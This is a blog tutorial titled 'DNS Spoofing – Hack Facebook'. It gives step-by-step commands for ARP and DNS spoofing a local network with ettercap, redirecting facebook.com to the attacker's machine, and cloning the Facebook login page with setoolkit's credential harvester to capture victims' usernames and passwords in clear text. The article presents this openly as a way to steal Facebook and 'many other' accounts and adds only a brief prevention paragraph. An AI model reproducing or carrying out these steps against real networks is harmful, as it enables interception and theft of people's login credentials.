• Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office
AnonyViet - English Version
  • Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office
No Result
View All Result
  • Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office
No Result
View All Result
AnonyViet - English Version
No Result
View All Result

DNS Spoofing – Hack Facebook

AnonyViet by AnonyViet
February 1, 2023
in Security
0

I would like to briefly talk about DNS – Domain Name System – Domain name resolution system.

Join the channel Telegram of the AnonyViet 👉 Link 👈

When you enter a web browser and type facebook.com, the DNS system will resolve it for you to an IP address so that you can communicate and transmit data on the network.

This article will be divided into 2 parts:

Part 1: Using ettercap to perform DNS Spoofing

Part 2: Using Setoolkit and Ettercap to steal facebook accounts.

Perform:

Part 1: Using ettercap to perform DNS Spoofing

First, I will ping facebook.com What is the IP address corresponding to the facebook.com domain name?

 photo facebook_zpsf1b7f07c.jpg

Next, go to Kali Linux and perform Enable IP Forwarding.

#echo 1 > /proc/sys/net/ipv4/ip_forward

 photo ipforwarding_zps9e90c910.jpg

Next edit the file etter.dns.

Use the locate etter.dns command to see where it is currently. Once done, proceed to add the following records:

facebook.com A 192.168.0.109

*.facebook.com A 192.168.0.109

With the address 192.168.0.109 is the Attacker machine IP.

 photo etherdns_zps6db36b10.jpg

Note: May be located at /usr/local/share/ettercap/etter.dns with Backtrack 5 versions

When done, save and exit :wq

 photo facebook2_zpscdfe6288.jpg

Perform dns spoofing with the command

#ettercap -T -q -M arp:remote -P dns_spoof //

 photo ettercap_zpsac23a3f7.jpg

Then go to the client machine, re-assign the address with the command >ipconfig /renew

 photo ettercap3_zps6c7aa75f.jpg

Now go to the PC client to access facebook.com you will see it still accesses normally. But when pinging to facebook.com, the IP reply is 192.168.0.109 – Attacker’s IP.

 photo pingfacebook2_zps52486770.jpg

OK. So you have succeeded in driving data through your computer, now we will proceed to steal Facebook account.

Part 2: Using setoolkit and ettercap to perform stealing facebook accounts.

Tools used:

setoolkit: clone website, capture username/password

ettercap: Scan hosts + ARP poisoning (ARP spoofing) + DNS spoofing + Sniff (eavesdropping).

Demo video: Youtube

Instructions with pictures

Enable setoolkit

#/usr/share/set/setoolkit

DNS Spoofing - Hack Facebook 20

Agree to terms of use Click y -> Enter

 photo setoolkit2_zps3d0fa4a2.jpg

Select 1) Social-Engineering Attacks

 photo setoolkit3_zps2970c553.jpg

Select 2) Website Attack Ventors

DNS Spoofing - Hack Facebook 21

Select 3) Credential Harvester Attack Method

DNS Spoofing - Hack Facebook 22

Select 2) Site Cloner

DNS Spoofing - Hack Facebook 23

Enter the Attacker’s IP address: 192.168.0.109

DNS Spoofing - Hack Facebook 24

Type the path you want to clone the website: https://www.facebook.com

DNS Spoofing - Hack Facebook 25

When done, turn on another Terminal, type ettercap -G to enable ettercap configuration with the interface

Select Sniff->Unified sniffing

DNS Spoofing - Hack Facebook 26

Select the port for eavesdropping: eth0

DNS Spoofing - Hack Facebook 27

Select Hosts-> Scan for hosts

Host-> Hosts List

DNS Spoofing - Hack Facebook 28

Choose 2 addresses to conduct eavesdropping

DNS Spoofing - Hack Facebook 29

Implement ARP possoning (ARP spoofing)

DNS Spoofing - Hack Facebook 30

Click select Sniff remote connections.

DNS Spoofing - Hack Facebook 31

Into the /etc/ettercap/etter.dns Add 2 lines:

facebook.com A 192.168.0.109

*.facebook.com A 192.168.0.109

DNS Spoofing - Hack Facebook 32

Into the Plugins->Manage the plugins

DNS Spoofing - Hack Facebook 33

Click on dns_spoof to enable this feature

DNS Spoofing - Hack Facebook 34

Start sniffing

DNS Spoofing - Hack Facebook 35

On the client computer, open a web browser to facebook.com, enter username/password

DNS Spoofing - Hack Facebook 36

setoolkit will catch this username/password

DNS Spoofing - Hack Facebook 37

The username/password information is displayed in clear-text as above, so you already have the client’s facebook account.

Updated on September 15, 2015:

In the new version of Kali 2.0, when the clone site returns, it will be saved in the /var/www/ path, copy these files to the /var/www/html path then proceed normally:

Note: remember to change the permissions to read and write for these files:

#cd /var/www/html
#chmod 777 ./*

Includes 3 files:
– index.html : interface of facebook.com
– post.php: function to get username/password when you enter it and save it in haverster_*.txt file
– harvester_date_time.txt : save the obtained information.

  photo clone1.png

In the same way you can steal many other accounts.

How to prevent DNS Spoofing:

In addition to the two ways in the article ARP spoofing is to deploy port-security and DAI, you should deploy more DHCP snooping to prevent fake DHCP levels.

P/s: As you have seen, if the attacker has entered our internal network with dark intentions, there are many tools to extract information about his company. Thus, if any employee intends to sabotage the company, it is quite difficult to investigate.

By the way, if you have any useful monitoring tools or programs, please share them with me.

Close,

The article achieved: 5/5 – (100 votes)

Tags: DNSFacebookHackSPOOFING
Previous Post

How to always open InPrivate Incognito mode in Edge Chromium browser

Next Post

How to Download New Microsoft Office on Android for Free

AnonyViet

AnonyViet

Related Posts

How to use hackers use Splitfus to execute PowerShell malicious code
Security

How to use hackers use Splitfus to execute PowerShell malicious code

July 20, 2025
How to implement Shellcode Injection attack technique with Autoit
Security

How to implement Shellcode Injection attack technique with Autoit

March 14, 2025
How to exploit the holy hole of Hijacking on Windows
Security

How to exploit the holy hole of Hijacking on Windows

March 8, 2025
Hamamal: Shellcode execution technique from afar to overcome Antivirus's discovery
Security

Hamamal: Shellcode execution technique from afar to overcome Antivirus's discovery

February 10, 2025
Snov.io Email Finder: Search emails with only company name/domain name/LinkedIn profile
Security

Snov.io Email Finder: Search emails with only company name/domain name/LinkedIn profile

December 14, 2024
Capsolver: Automatic solution solution for business
Security

Capsolver: Automatic solution solution for business

December 12, 2024
Next Post
How to Download New Microsoft Office on Android for Free

How to Download New Microsoft Office on Android for Free

0 0 votes
Article Rating
Subscribe
Login
Notify of
guest

guest

0 Comments
Oldest
Newest Most Voted
Inline Feedbacks
View all comments

Recent News

Instructions for receiving 80GB of free data from VinaPhone from August 15

Instructions for receiving 80GB of free data from VinaPhone from August 15

August 15, 2025
Online driving exam preparation: Support theory and practice

Online driving exam preparation: Support theory and practice

August 15, 2025
How to add application to your favorite bar

How to add application to your favorite bar

August 14, 2025
Wowhay.com – The door opens the world of modern knowledge and network culture

Wowhay.com – The door opens the world of modern knowledge and network culture

August 13, 2025
Instructions for receiving 80GB of free data from VinaPhone from August 15

Instructions for receiving 80GB of free data from VinaPhone from August 15

August 15, 2025
Online driving exam preparation: Support theory and practice

Online driving exam preparation: Support theory and practice

August 15, 2025
How to add application to your favorite bar

How to add application to your favorite bar

August 14, 2025
AnonyViet - English Version

AnonyViet

AnonyViet is a website share knowledge that you have never learned in school!

We are ready to welcome your comments, as well as your articles sent to AnonyViet.

Follow Us

Contact:

Email: anonyviet.com[@]gmail.com

Main Website: https://anonyviet.com

Recent News

Instructions for receiving 80GB of free data from VinaPhone from August 15

Instructions for receiving 80GB of free data from VinaPhone from August 15

August 15, 2025
Online driving exam preparation: Support theory and practice

Online driving exam preparation: Support theory and practice

August 15, 2025
  • Home
  • Home 2
  • Home 3
  • Home 4
  • Home 5
  • Home 6
  • Next Dest Page
  • Sample Page

©2024 AnonyVietFor Knowledge kqxs hôm nay xem phim miễn phí mm88 8XBET mm88 trang chủ new88

No Result
View All Result
  • Home
  • News
  • Software
  • Knowledge
  • MMO
  • Tips
  • Security
  • Network
  • Office

©2024 AnonyVietFor Knowledge kqxs hôm nay xem phim miễn phí mm88 8XBET mm88 trang chủ new88

wpDiscuz
0
0
Would love your thoughts, please comment.x
()
x
| Reply